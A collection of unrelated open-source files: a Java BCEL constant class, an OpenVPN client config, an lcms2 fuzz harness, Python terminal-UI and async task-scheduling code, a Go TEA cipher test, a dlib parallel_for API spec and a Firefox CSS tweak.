* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.sun.org.apache.bcel.internal.classfile;
import java.io.DataInput;
import java.io.DataOutputStream;
import java.io.IOException;
import com.sun.org.apache.bcel.internal.Const;
/**
* This class is derived from the abstract {@link Constant}
* and represents a reference to a String object.
*
* @version $Id$
* @see Constant
*/
public final class ConstantString extends Constant implements ConstantObject {
private int string_index; // Identical to ConstantClass except for this name
/**
* Initialize from another object.
*/
public ConstantString(final ConstantString c) {
this(c.getStringIndex());
}
/**
* Initialize instance from file data.
*
* @param file Input stream
* @throws IOException
*/
ConstantString(final DataInput file) throws IOException {
this(file.readUnsignedShort());
}
/**
* @param string_index Index of Constant_Utf8 in constant pool
*/
public ConstantString(final int string_index) {
super(Const.CONSTANT_String);
this.string_index = string_index;
}
/**
     * Called by objects that are traversing the nodes of the tree implicitly
* defined by the contents of a Java class. I.e., the hierarchy of methods,
* fields, attributes, etc. spawns a tree of objects.
*
* @param v Visitor object
*/
@Override
public void accept( final Visitor v ) {
v.visitConstantString(this);
}
/**
* Dump constant field reference to file stream in binary format.
*
* @param file Output file stream
* @throws IOException
*/
@Override
public final void dump( final DataOutputStream file ) throws IOException {
file.writeByte(super.getTag());
file.writeShort(string_index);
}
/**
* @return Index in constant pool of the string (ConstantUtf8).
*/
public final int getStringIndex() {
return string_index;
}
/**
* @param string_index the index into the constant of the string value
*/
public final void setStringIndex( final int string_index ) {
this.string_index = string_index;
}
/**
* @return String representation.
*/
@Override
public final String toString() {
return super.toString() + "(string_index = " + string_index + ")";
}
/** @return String object
*/
@Override
public Object getConstantValue( final ConstantPool cp ) {
final Constant c = cp.getConstant(string_index, Const.CONSTANT_Utf8);
return ((ConstantUtf8) c).getBytes();
}
/** @return dereferenced string
*/
public String getBytes( final ConstantPool cp ) {
return (String) getConstantValue(cp);
}
}
| {
"pile_set_name": "Github"
} |
client
dev tun
proto tcp
remote sg.mullvad.net 80
cipher AES-256-CBC
resolv-retry infinite
nobind
persist-key
persist-tun
verb 3
remote-cert-tls server
ping 10
ping-restart 60
sndbuf 524288
rcvbuf 524288
auth-user-pass /config/openvpn-credentials.txt
ca /etc/openvpn/mullvad/ca.crt
tun-ipv6
script-security 2
tls-cipher TLS-DHE-RSA-WITH-AES-256-GCM-SHA384:TLS-DHE-RSA-WITH-AES-256-CBC-SHA
| {
"pile_set_name": "Github"
} |
// Copyright 2016 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
////////////////////////////////////////////////////////////////////////////////
#include <stdint.h>
#include "lcms2.h"
// The main sink
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
if (size == 0)
return 0;
cmsHANDLE handle = cmsIT8LoadFromMem(0, (void *)data, size);
if (handle)
cmsIT8Free(handle);
return 0;
}
| {
"pile_set_name": "Github"
} |
"""
Components for "My playlists" page.
"""
import urwid
from clay.gp import gp
from clay.songlist import SongListBox
from clay.notifications import notification_area
from clay.pages.page import AbstractPage
from clay.hotkeys import hotkey_manager
class MyPlaylistListItem(urwid.Columns):
"""
One playlist in the list of playlists.
"""
signals = ['activate']
def __init__(self, playlist):
self.playlist = playlist
self.text = urwid.SelectableIcon(u' \u2630 {} ({})'.format(
self.playlist.name,
len(self.playlist.tracks)
), cursor_position=3)
self.text.set_layout('left', 'clip', None)
self.content = urwid.AttrWrap(
self.text,
'default',
'selected'
)
super(MyPlaylistListItem, self).__init__([self.content])
def keypress(self, size, key):
"""
Handle keypress.
"""
return hotkey_manager.keypress("playlist_page", self, super(MyPlaylistListItem, self),
size, key)
def start_playlist(self):
"""
Start playing the selected playlist
"""
urwid.emit_signal(self, 'activate', self)
def get_tracks(self):
"""
Returns a list of :class:`clay.gp.Track` instances.
"""
return self.playlist.tracks
class MyPlaylistListBox(urwid.ListBox):
"""
List of playlists.
"""
signals = ['activate']
def __init__(self, app):
self.app = app
self.walker = urwid.SimpleListWalker([
urwid.Text('Not ready')
])
self.notification = None
gp.auth_state_changed += self.auth_state_changed
super(MyPlaylistListBox, self).__init__(self.walker)
def auth_state_changed(self, is_auth):
"""
        Called when auth state changes (e.g. user is logged in).
Requests fetching of playlists.
"""
if is_auth:
self.walker[:] = [
urwid.Text(u'\n \uf01e Loading playlists...', align='center')
]
gp.get_all_user_playlist_contents_async(callback=self.on_get_playlists)
def on_get_playlists(self, playlists, error):
"""
Called when a list of playlists fetch completes.
Populates list of playlists.
"""
        if error:
            notification_area.notify('Failed to get playlists: {}'.format(str(error)))
            return
items = []
for playlist in playlists:
myplaylistlistitem = MyPlaylistListItem(playlist)
urwid.connect_signal(
myplaylistlistitem, 'activate', self.item_activated
)
items.append(myplaylistlistitem)
self.walker[:] = items
self.app.redraw()
def item_activated(self, myplaylistlistitem):
"""
Called when a specific playlist is selected.
Re-emits this event.
"""
urwid.emit_signal(self, 'activate', myplaylistlistitem)
class MyPlaylistsPage(urwid.Columns, AbstractPage):
"""
Playlists page.
Contains two parts:
- List of playlists (:class:`.MyPlaylistListBox`)
- List of songs in selected playlist (:class:`clay:songlist:SongListBox`)
"""
@property
def name(self):
return 'Playlists'
@property
def key(self):
return 2
@property
def slug(self):
"""
Return page ID (str).
"""
return "playlists"
def __init__(self, app):
self.app = app
self.myplaylistlist = MyPlaylistListBox(app)
self.songlist = SongListBox(app)
self.songlist.set_placeholder('\n Select a playlist.')
urwid.connect_signal(
self.myplaylistlist, 'activate', self.myplaylistlistitem_activated
)
super(MyPlaylistsPage, self).__init__([
self.myplaylistlist,
self.songlist
])
def myplaylistlistitem_activated(self, myplaylistlistitem):
"""
Called when specific playlist is selected.
Populates songlist with tracks from the selected playlist.
"""
self.songlist.populate(
myplaylistlistitem.get_tracks()
)
def activate(self):
pass
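The playlist widgets above wire themselves together through urwid's signal mechanism: `MyPlaylistListItem` emits `'activate'`, and `MyPlaylistsPage` re-emits it to populate the song list. As a rough sketch of that observer pattern, the `Emitter` class below is a hypothetical stand-in for illustration only, not urwid's real signal machinery:

```python
# Minimal stand-in for urwid's connect_signal/emit_signal pattern.
class Emitter:
    signals = ['activate']

    def __init__(self):
        # One callback list per declared signal name.
        self._handlers = {name: [] for name in self.signals}

    def connect_signal(self, name, callback):
        self._handlers[name].append(callback)

    def emit_signal(self, name, *args):
        for callback in self._handlers[name]:
            callback(*args)

playlist_item = Emitter()
page = Emitter()
# The page re-emits the item's 'activate', as MyPlaylistsPage does.
playlist_item.connect_signal(
    'activate', lambda item: page.emit_signal('activate', item))
received = []
page.connect_signal('activate', received.append)
playlist_item.emit_signal('activate', playlist_item)
```

The same chain appears in the real code: item activation bubbles up through the list box to the page, which then calls `songlist.populate()`.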
| {
"pile_set_name": "Github"
} |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package tea
import (
"bytes"
"testing"
)
// A sample test key for when we just want to initialize a cipher
var testKey = []byte{0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF}
// Test that the block size for tea is correct
func TestBlocksize(t *testing.T) {
c, err := NewCipher(testKey)
if err != nil {
t.Fatalf("NewCipher returned error: %s", err)
}
if result := c.BlockSize(); result != BlockSize {
t.Errorf("cipher.BlockSize returned %d, but expected %d", result, BlockSize)
}
}
// Test that invalid key sizes return an error
func TestInvalidKeySize(t *testing.T) {
var key [KeySize + 1]byte
if _, err := NewCipher(key[:]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", len(key))
}
if _, err := NewCipher(key[:KeySize-1]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", KeySize-1)
}
}
// Test Vectors
type teaTest struct {
rounds int
key []byte
plaintext []byte
ciphertext []byte
}
var teaTests = []teaTest{
// These were sourced from https://github.com/froydnj/ironclad/blob/master/testing/test-vectors/tea.testvec
{
numRounds,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x41, 0xea, 0x3a, 0x0a, 0x94, 0xba, 0xa9, 0x40},
},
{
numRounds,
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0x31, 0x9b, 0xbe, 0xfb, 0x01, 0x6a, 0xbd, 0xb2},
},
{
16,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0xed, 0x28, 0x5d, 0xa1, 0x45, 0x5b, 0x33, 0xc1},
},
}
// Test encryption
func TestCipherEncrypt(t *testing.T) {
// Test encryption with standard 64 rounds
for i, test := range teaTests {
c, err := NewCipherWithRounds(test.key, test.rounds)
if err != nil {
t.Fatalf("#%d: NewCipher returned error: %s", i, err)
}
var ciphertext [BlockSize]byte
c.Encrypt(ciphertext[:], test.plaintext)
if !bytes.Equal(ciphertext[:], test.ciphertext) {
t.Errorf("#%d: incorrect ciphertext. Got %x, wanted %x", i, ciphertext, test.ciphertext)
}
var plaintext2 [BlockSize]byte
c.Decrypt(plaintext2[:], ciphertext[:])
if !bytes.Equal(plaintext2[:], test.plaintext) {
t.Errorf("#%d: incorrect plaintext. Got %x, wanted %x", i, plaintext2, test.plaintext)
}
}
}
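For illustration, here is a rough Python sketch of the TEA cipher those test vectors exercise — a reference-style implementation assuming big-endian word packing (as Go's `crypto/tea` uses) and `rounds/2` Feistel cycles. It is a hedged sketch, not the package under test:

```python
import struct

DELTA = 0x9E3779B9  # TEA key-schedule constant
MASK = 0xFFFFFFFF   # emulate uint32 wraparound

def tea_encrypt(block, key, rounds=64):
    # One 8-byte block, 16-byte key; 'rounds' Feistel rounds run as
    # rounds // 2 cycles, matching NewCipherWithRounds above.
    v0, v1 = struct.unpack('>2I', block)
    k0, k1, k2, k3 = struct.unpack('>4I', key)
    total = 0
    for _ in range(rounds // 2):
        total = (total + DELTA) & MASK
        v0 = (v0 + ((((v1 << 4) & MASK) + k0)
                    ^ ((v1 + total) & MASK)
                    ^ ((v1 >> 5) + k1))) & MASK
        v1 = (v1 + ((((v0 << 4) & MASK) + k2)
                    ^ ((v0 + total) & MASK)
                    ^ ((v0 >> 5) + k3))) & MASK
    return struct.pack('>2I', v0, v1)
```

Run against the vectors listed in `teaTests`, the all-zero key/plaintext input should produce `41ea3a0a94baa940` at the full 64 rounds and `ed285da1455b33c1` at 16 rounds.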
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2013 Davis E. King (davis@dlib.net)
// License: Boost Software License See LICENSE.txt for the full license.
#undef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#ifdef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#include "thread_pool_extension_abstract.h"
#include "async_abstract.h"
namespace dlib
{
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This is a convenience function for submitting a block of jobs to a thread_pool.
In particular, given the half open range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call (obj.*funct)() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that (obj.*funct)(begin[i], end[i]) is invoked for all valid
values of i. Moreover, the subranges are non-overlapping and completely
cover the total range of [begin, end).
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- chunks_per_thread > 0
- begin <= end
ensures
- This is a convenience function for submitting a block of jobs to a
thread_pool. In particular, given the range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call funct() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that funct(begin[i], end[i]) is invoked for all valid values
of i.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
parallel_for_blocked(default_thread_pool(), begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
(obj.*funct)(i);
}, chunks_per_thread);
- Therefore, this routine invokes (obj.*funct)(i) for all i in the range
[begin, end). However, it does so using tp.num_threads_in_pool() parallel
threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
funct(i);
}, chunks_per_thread);
- Therefore, this routine invokes funct(i) for all i in the range [begin, end).
However, it does so using tp.num_threads_in_pool() parallel threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
parallel_for(default_thread_pool(), begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
- It will also use the default_thread_pool().
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long,long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long,long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked_verbose (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for_blocked() routine defined
above except that it will print messages to cout showing the progress in
executing the parallel for loop.
- It will also use the default_thread_pool()
!*/
// ----------------------------------------------------------------------------------------
}
#endif // DLIB_PARALLEL_FoR_ABSTRACT_Hh_
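As a language-neutral illustration of the chunking contract specified above — split `[begin, end)` into roughly `num_threads * chunks_per_thread` contiguous, non-overlapping subranges that cover the whole range, then invoke `funct(begin[i], end[i])` on a thread pool — here is a hypothetical Python sketch. It is not dlib code, just a model of the documented behavior:

```python
from concurrent.futures import ThreadPoolExecutor

def parallel_for_blocked(num_threads, begin, end, funct, chunks_per_thread=8):
    # Split [begin, end) into about num_threads * chunks_per_thread blocks,
    # but never more blocks than elements and never fewer than one.
    total = end - begin
    nblocks = max(1, min(total, num_threads * chunks_per_thread))
    step, rem = divmod(total, nblocks)
    ranges = []
    lo = begin
    for i in range(nblocks):
        hi = lo + step + (1 if i < rem else 0)
        ranges.append((lo, hi))
        lo = hi
    # The subranges are non-overlapping and cover [begin, end) completely.
    with ThreadPoolExecutor(max_workers=num_threads) as pool:
        for future in [pool.submit(funct, a, b) for a, b in ranges]:
            future.result()  # propagate exceptions, like a blocking join
```

`parallel_for(i)`-style usage then falls out by wrapping a per-index function in a loop over each subrange, exactly as the specs above describe.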
| {
"pile_set_name": "Github"
} |
import asyncio
import random
from typing import Optional, Callable
import aiojobs
import bili_statistics
from user.user import User
from tasks.base_class import TaskType, UniqueType, How2Call
from printer import info as print
class Users:
__slots__ = ('_users', '_global_task_control', '_global_task_arrangement', '_dict_bili', '_force_sleep')
def __init__(self,
global_task_control: dict, global_task_arrangement: dict,
dict_bili: dict, force_sleep: Callable):
self._users = []
self._global_task_control = global_task_control
self._global_task_arrangement = global_task_arrangement
self._dict_bili = dict_bili
self._force_sleep = force_sleep
@property
def superuser(self) -> User:
return self._users[0]
def gets_with_restrict(self, index: int, task):
task_name = task.TASK_NAME
for user in self.gets(index):
if user.is_in_jail and task_name in (
'recv_heart_gift',
'open_silver_box',
'join_storm_raffle',
'join_guard_raffle',
'join_tv_raffle',
'join_pk_raffle'
):
continue
            if task_name != 'null':  # 'null' skips all filtering and always participates
                if f'probability_{task_name}' in user.task_arrangement:  # uniform-probability filter
if not random.random() < user.task_arrangement[f'probability_{task_name}']:
continue
                if not bili_statistics.add2max_time_task_checkers(  # daily max-count filter
user_id=user.id,
task=task,
max_time=user.task_arrangement.get(task_name, -1)):
continue
yield user
    # async only because of the aiohttp session inside User; even if the coroutine is
    # switched it should be harmless -- append does not yield, so a running notifier is unaffected
async def add_user(self, user_info: dict, custom_task_control: dict, custom_task_arrangement: dict):
task_control = {**self._global_task_control, **custom_task_control}
task_arrangement = {**self._global_task_arrangement, **custom_task_arrangement}
user = User(
dict_user=user_info,
task_ctrl=task_control,
task_arrangement=task_arrangement,
dict_bili=self._dict_bili,
force_sleep=self._force_sleep)
self._users.append(user)
def gets(self, index: int):
if index == -2:
for user in self._users:
yield user
return
user = self._users[index]
yield user
class Notifier:
__slots__ = ('_loop', '_users', '_scheduler',)
def __init__(self, loop=None):
if loop is None:
self._loop = asyncio.get_event_loop()
else:
self._loop = loop
self._users: Optional[Users] = None
self._scheduler: Optional[aiojobs.Scheduler] = None
def init(self, users: Users):
self._users = users
async def add_user(self, **kwargs):
await self._users.add_user(**kwargs)
    # pause and resume must be used on the same event loop, otherwise something
    # akin to a thread-safety problem can occur
async def resume(self):
if self._scheduler is None:
self._scheduler = await aiojobs.create_scheduler()
async def pause(self):
if self._scheduler is not None and not self._scheduler.closed:
scheduler = self._scheduler
self._scheduler = None
await scheduler.close()
@staticmethod
async def _unique_work(user: User, task, func: Callable, *args, **kwargs):
if bili_statistics.start_unique_task(user.id, task):
try:
result = await func(user, *args, **kwargs)
bili_statistics.done_unique_task(user.id, task)
return result
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
bili_statistics.cancel_unique_task(user.id, task)
else:
            print(f'Duplicate push of {func} for {user.id} (debug info, safe to ignore)')
return None
@staticmethod
async def _multi_work(user: User, _, func: Callable, *args, **kwargs):
try:
return await func(user, *args, **kwargs)
except asyncio.CancelledError:
print(f'CONFIRMED CANCEL {user} {func}')
return None
async def run_sched_func(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
await scheduler.spawn(func(*args, **kwargs))
    # this exists because daily-task checks need the return value
async def run_sched_func_with_return(self, func: Callable, *args, **kwargs):
scheduler = self._scheduler
if scheduler is not None and not scheduler.closed:
return await func(*args, **kwargs)
def run_sched_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_sched_func(*args, **kwargs))
@staticmethod
async def run_forced_func(func: Callable, *args, **kwargs):
return await func(*args, **kwargs)
def run_forced_func_bg(self, *args, **kwargs):
self._loop.create_task(self.run_forced_func(*args, **kwargs))
async def _dont_wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
_):
for user_id, delay_range, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
delay = random.uniform(*delay_range)
self._loop.call_later(
delay, handle_work, handle_unique, user, task, func_work, *args)
async def _wait(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
await handle_work(handle_unique, user, task, func_work, *args)
return None
results = []
for user_id, _, *args in check_results:
for user in self._users.gets_with_restrict(user_id, task):
results.append(await handle_work(handle_unique, user, task, func_work, *args))
return results
async def _wait_and_pass(self, task,
handle_work: Callable,
handle_unique: Callable,
func_work: Callable,
check_results,
return_results: bool):
if not return_results:
for user_id, _, *args in check_results:
result = args
for user in self._users.gets_with_restrict(user_id, task):
result = await handle_work(handle_unique, user, task, func_work, *result)
return None
results = []
for user_id, _, *args in check_results:
result = args
for user in self._users.gets_with_restrict(user_id, task):
result = await handle_work(handle_unique, user, task, func_work, *(result[-1]))
results.append(result[:-1])
return results
    '''
    A `task` argument is expected here. Pass the class itself, not an instance!
    class Task:
        async def check()
        async def <work function>()  # work / web_console_work / cmd_console_work
    '''
    # handle_check   wrapper the notifier uses when running task.check
    # handle_works   wrapper the notifier uses when running the task's "work functions"
    # handle_work    outer wrapper around each user's "work function"; unused for WAIT and
    #                WAIT_AND_PASS, which are always forced
    # handle_unique  inner wrapper around each user's "work function": _unique_work / _multi_work
    # func_work      the "work function" itself, e.g. task.work
async def exec_task(self, task, *args, **kwargs):
handle_check = None
handle_works = None
handle_work = None
func_work = None
handle_unique = None
need_results = None
if task.TASK_TYPE == TaskType.SCHED:
handle_check = self.run_sched_func_with_return
func_work = task.work
need_results = False
elif task.TASK_TYPE == TaskType.FORCED:
handle_check = self.run_forced_func
func_work = task.work
need_results = False
elif task.TASK_TYPE == TaskType.CONSOLE:
handle_check = self.run_forced_func
            ctrl, *args = args  # at this point ctrl is carried inside args
if ctrl == 'web':
func_work = task.web_console_work
need_results = True
elif ctrl == 'cmd':
func_work = task.cmd_console_work
need_results = False
if task.HOW2CALL == How2Call.DONT_WAIT:
handle_works = self._dont_wait
if task.TASK_TYPE == TaskType.SCHED:
handle_work = self.run_sched_func_bg
else:
handle_work = self.run_forced_func_bg
elif task.HOW2CALL == How2Call.WAIT:
handle_works = self._wait
handle_work = self.run_forced_func
elif task.HOW2CALL == How2Call.WAIT_AND_PASS:
handle_works = self._wait_and_pass
handle_work = self.run_forced_func
if task.UNIQUE_TYPE == UniqueType.MULTI:
handle_unique = self._multi_work
elif task.UNIQUE_TYPE == UniqueType.UNIQUE:
handle_unique = self._unique_work
check_results = await handle_check(task.check, self._users.superuser, *args, **kwargs)
print('check_results:', task, check_results)
if check_results is not None:
return await handle_works(task, handle_work, handle_unique, func_work, check_results, need_results)
async def exec_func(self, func: Callable, *args, **kwargs):
return await func(self._users.superuser, *args, **kwargs)
def exec_task_no_wait(self, task, *args, **kwargs):
self._loop.create_task(self.exec_task(task, *args, **kwargs))
def get_users(self, user_id: int):
return self._users.gets(user_id)
var_notifier = Notifier()
def init(**kwargs):
var_notifier.init(**kwargs)
async def exec_task(task, *args, **kwargs):
return await var_notifier.exec_task(task, *args, **kwargs)
def exec_task_no_wait(task, *args, **kwargs):
var_notifier.exec_task_no_wait(task, *args, **kwargs)
async def exec_func(func: Callable, *args, **kwargs):
return await var_notifier.exec_func(func, *args, **kwargs)
async def pause():
await var_notifier.pause()
async def resume():
await var_notifier.resume()
async def add_user(**kwargs):
await var_notifier.add_user(**kwargs)
def get_users(user_id: int):
return var_notifier.get_users(user_id)
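`_unique_work` above deduplicates in-flight pushes per user/task through `bili_statistics` (start, done, cancel). A stripped-down sketch of that guard, using a plain set in place of the statistics module — hypothetical and simplified, for illustration only:

```python
import asyncio

_in_flight = set()

async def run_unique(key, coro_func, *args):
    # Mirrors _unique_work: skip if an identical task is already running,
    # and always release the key when the task finishes or is cancelled.
    if key in _in_flight:
        return None  # duplicate push; ignore (debug-level event)
    _in_flight.add(key)
    try:
        return await coro_func(*args)
    finally:
        _in_flight.discard(key)

async def demo():
    async def slow_job():
        await asyncio.sleep(0.01)
        return 'done'
    # Two concurrent pushes of the same user/task key: only one runs.
    return await asyncio.gather(run_unique('uid1:task', slow_job),
                                run_unique('uid1:task', slow_job))
```

The first coroutine claims the key before it yields at `await`, so the second sees the key already present and bails out immediately.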
| {
"pile_set_name": "Github"
} |
/* Firefox Quantum userChrome.css tweaks ************************************************/
/* Github: https://github.com/aris-t2/customcssforfx ************************************/
/****************************************************************************************/
@import "./addonlists_compact.css";
#addons-page .addon{
padding: 0 4px !important;
}
| {
"pile_set_name": "Github"
} |
/*
